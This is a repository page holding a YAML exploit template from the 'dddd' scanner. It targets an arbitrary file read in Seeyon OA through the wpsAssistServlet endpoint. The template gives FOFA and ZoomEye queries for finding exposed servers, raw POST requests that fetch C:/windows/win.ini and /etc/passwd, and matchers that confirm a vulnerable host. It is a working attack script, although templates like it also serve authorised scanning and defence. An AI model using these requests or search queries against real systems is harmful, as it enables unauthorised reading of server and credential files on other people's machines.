admin/dddd
1
0
Fork 0
mirror of https://github.com/SleepingBag945/dddd.git synced 2025-06-12 02:05:48 +00:00
Code Issues Packages Projects Releases Wiki Activity
dddd/common/config/pocs/seeyon-wpsassist-servlet-fileread.yaml
SleepingBag945 9a83a1b39f dddd v2.0
2024-04-03 06:32:26 +02:00

33 lines
850 B
YAML
Raw Blame History

id: seeyon-wpsassist-servlet-fileread
info:
name: 致远OA存在任意文件读取漏洞
author: SleepingBag945
severity: high
description: |-
FOFA: app="致远互联-OA" && title="V8.0SP2"
ZoomEye: app:"用友 致远OA"
tags: seeyon,fileread
http:
- raw:
- |
POST /seeyon/wpsAssistServlet HTTP/1.1
Host: {{Hostname}}
flag=template&templateUrl=C:/windows/win.ini
- |
POST /seeyon/wpsAssistServlet HTTP/1.1
Host: {{Hostname}}
flag=template&templateUrl=/etc/passwd
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "status_code_1==200 && contains(body_1, 'bit app support') && contains(body_1, 'fonts') && contains(body_1, 'extensions')"
- "status_code_2==200 && regex('root:.*:0', body_2)"
condition: or
Reference in New Issue View Git Blame Copy Permalink